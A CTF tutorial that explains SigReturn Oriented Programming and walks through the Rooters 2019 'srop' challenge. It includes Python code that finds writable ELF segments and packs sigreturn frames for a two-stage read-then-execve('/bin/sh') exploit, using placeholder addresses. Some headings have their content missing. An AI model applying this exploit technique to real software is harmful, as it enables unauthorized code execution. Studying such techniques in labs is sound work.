
syscalls and SROP: SigReturn Oriented Programming

OK so this is another cool tool for your PWN utility belt.

Here's the promise:

Imagine the ability to set every. single. register. at once.

With that kind of power you can set the instruction pointer to any location and pass it whatever arguments you need.

You could rework the location of the entire stack.

A pretty powerful PWN primitive.

Well, all you need is syscall 0xf and about 300 bytes.

(In 32-bit that's 0x77 and int 0x80)

Let's see it in action.

What's a syscall?

syscall is a low-level operation where the CODE can call the KERNEL. This is how operating systems separate processes from all the low-level concerns such as where files live, spawning a sub-process, interrupting a process, etc.

The way it works is pretty simple LINK TO THE TABLE:

OK so it's a new kind of calling convention:

If you have a gadget that uses syscall you'll also need a way to load/change RAX, which holds the syscall number (and is also the return value of most functions, including some syscalls).

In 32-bit it's called int 0x80, not syscall, and it also gets its own 32-bit syscall table.

Key syscall functions:

Live Demo: small_boi

Walkthrough time: srop from Rooters 2019

I have the binary for you at /ctf/srop/vuln if you'd like to follow along.

There are also several write-ups on the internet out there which you can use to get started when you're ready.

So our job is to execve("/bin/sh\x00"), and we can control all of the registers at once.

Since we have to manufacture a win function, we need to:

Minor Aside:

The pwntools ELF tool is awesome.

elf.writable_segments is a list of any segments that are writable.

elf.writable_segments[0].header['p_paddr'] gets you at the segment's header fields, although fart around with it yourself rather than copy-pasting this one.
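To show what elf.writable_segments is actually looking at, here is an added example (not pwntools code and not from the original page) that parses the ELF64 program headers by hand and picks out the PT_LOAD segments with the PF_W bit set. The ELF image it parses is constructed inline, with placeholder addresses, so it runs offline; note that p_vaddr is the address the loader maps the segment at, which is the field you want for "dataseg".

```python
import struct

# ELF64 constants from the ELF specification.
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4

EHDR_FMT = "<16sHHIQQQIHHHHHH"   # Elf64_Ehdr, 64 bytes
PHDR_FMT = "<IIQQQQQQ"           # Elf64_Phdr, 56 bytes
PHDR_FIELDS = ("p_type", "p_flags", "p_offset", "p_vaddr", "p_paddr",
               "p_filesz", "p_memsz", "p_align")


def parse_program_headers(image: bytes) -> list:
    """Return the program headers of a little-endian ELF64 image as dicts."""
    if image[:4] != b"\x7fELF" or image[4] != 2 or image[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (_ident, _type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum, *_rest) = struct.unpack_from(EHDR_FMT, image, 0)
    headers = []
    for i in range(e_phnum):
        fields = struct.unpack_from(PHDR_FMT, image, e_phoff + i * e_phentsize)
        headers.append(dict(zip(PHDR_FIELDS, fields)))
    return headers


def writable_segments(image: bytes) -> list:
    """Loadable segments mapped writable: the same set pwntools' ELF.writable_segments gives you."""
    return [h for h in parse_program_headers(image)
            if h["p_type"] == PT_LOAD and h["p_flags"] & PF_W]


def first_writable_address(image: bytes) -> int:
    """p_vaddr of the first writable segment: where the loader actually maps it."""
    segs = writable_segments(image)
    if not segs:
        raise ValueError("no writable PT_LOAD segment")
    return segs[0]["p_vaddr"]


def build_sample_elf() -> bytes:
    """Constructed ELF64 image: one R+X segment and one R+W segment. Addresses are placeholders."""
    phdrs = [
        (PT_LOAD, PF_R | PF_X, 0x0,    0x400000, 0x400000, 0x1000, 0x1000, 0x1000),
        (PT_LOAD, PF_R | PF_W, 0x1000, 0x601000, 0x601000, 0x100,  0x1000, 0x1000),
    ]
    # e_ident: magic, ELFCLASS64, ELFDATA2LSB, EV_CURRENT, then padding.
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    ehdr = struct.pack(EHDR_FMT, ident, 2, 0x3e, 1, 0x400000, 64, 0, 0,
                       64, 56, len(phdrs), 64, 0, 0)
    return ehdr + b"".join(struct.pack(PHDR_FMT, *p) for p in phdrs)


if __name__ == "__main__":
    image = build_sample_elf()
    for seg in writable_segments(image):
        print(f"writable segment at {seg['p_vaddr']:#x} ({seg['p_memsz']:#x} bytes)")
```

On a real binary you would read the file into image instead of calling build_sample_elf(); everything else stays the same.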

Using the SROP:

pwntools makes this easy:

Writing /bin/sh

So we've found a writable segment; let's call it dataseg.

We need to write to the dataseg and craft our own baby stack over there.

So that might look something like this:
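The frame that syscall 0xf restores every register from, and the baby stack described above, as an added example that is not part of the original page and not pwntools code. The field offsets are the ones in the kernel's struct ucontext / struct sigcontext_64 as I read them in the uapi headers (the 304 bytes behind the "about 300 bytes" promise), and they agree with pwntools' amd64 SigreturnFrame for the named registers. SYSCALL_RET, SIGRET_TRIG and DATASEG are constructed placeholders, not addresses from the Rooters binary; the example assumes SIGRET_TRIG is some code in the binary that reaches syscall with RAX = 0xf without touching the stack.

```python
import struct

# Byte offsets of the fields rt_sigreturn (syscall 0xf) restores registers from.
# rsp must point at uc_flags when the syscall runs. Layout: struct ucontext ->
# uc_mcontext (struct sigcontext_64), as read from the kernel uapi headers.
FRAME_LAYOUT = [
    ("uc_flags", 0), ("uc_link", 8), ("ss_sp", 16), ("ss_flags", 24), ("ss_size", 32),
    ("r8", 40), ("r9", 48), ("r10", 56), ("r11", 64), ("r12", 72), ("r13", 80),
    ("r14", 88), ("r15", 96), ("rdi", 104), ("rsi", 112), ("rbp", 120),
    ("rbx", 128), ("rdx", 136), ("rax", 144), ("rcx", 152), ("rsp", 160),
    ("rip", 168), ("eflags", 176), ("csgsfs", 184), ("err", 192),
    ("trapno", 200), ("oldmask", 208), ("cr2", 216), ("fpstate", 224),
]
FRAME_SIZE = 304              # ... + reserved1[8] (232..296) + uc_sigmask (296..304)
FIELD_NAMES = {name for name, _ in FRAME_LAYOUT}

SYS_READ, SYS_EXECVE = 0, 59
USER_CS, USER_SS = 0x33, 0x2b   # user-mode code/stack selectors on x86-64 Linux


def build_frame(**regs) -> bytes:
    """Pack a sigreturn frame; any field not given is zero (fpstate=0 means no FPU state)."""
    unknown = set(regs) - FIELD_NAMES
    if unknown:
        raise ValueError(f"not frame fields: {sorted(unknown)}")
    values = {"csgsfs": USER_CS | (USER_SS << 48)}   # cs in the low word, ss in the top word
    values.update(regs)
    buf = bytearray(FRAME_SIZE)
    for name, off in FRAME_LAYOUT:
        struct.pack_into("<Q", buf, off, values.get(name, 0))
    return bytes(buf)


def decode_frame(frame: bytes) -> dict:
    """Read a frame back into a register dict, e.g. to check a payload or a stack dump."""
    if len(frame) < FRAME_SIZE:
        raise ValueError("frame too short")
    return {name: struct.unpack_from("<Q", frame, off)[0] for name, off in FRAME_LAYOUT}


# Constructed placeholders; the real values come from the binary you are looking at.
SYSCALL_RET = 0x401000   # assumed: address of a "syscall ; ret" gadget
SIGRET_TRIG = 0x401010   # assumed: code that reaches syscall with rax = 0xf
DATASEG     = 0x601000   # assumed: p_vaddr of the writable segment ("dataseg")


def stage2_payload() -> bytes:
    """The baby stack that lives at DATASEG: [SIGRET_TRIG][execve frame]["/bin/sh\\0"]."""
    binsh_addr = DATASEG + 8 + FRAME_SIZE          # string sits right after the frame
    execve_frame = build_frame(rax=SYS_EXECVE, rdi=binsh_addr, rsi=0, rdx=0,
                               rsp=DATASEG, rip=SYSCALL_RET)
    return struct.pack("<Q", SIGRET_TRIG) + execve_frame + b"/bin/sh\x00"


def stage1_frame() -> bytes:
    """First sigreturn: read(0, DATASEG, len(stage 2)) with the stack moved to DATASEG,
    so the ret after the syscall pops SIGRET_TRIG and rsp lands on the execve frame."""
    return build_frame(rax=SYS_READ, rdi=0, rsi=DATASEG, rdx=len(stage2_payload()),
                       rsp=DATASEG, rip=SYSCALL_RET)


if __name__ == "__main__":
    for name, val in decode_frame(stage1_frame()).items():
        if val:
            print(f"{name:8} = {val:#x}")
```

The two frames are the whole trick: the first one turns a single syscall 0xf into a read() that lands stage 2 in dataseg and parks rsp there, and the second one, already sitting in dataseg, turns the next syscall 0xf into execve with rdi pointing at the "/bin/sh" we just wrote.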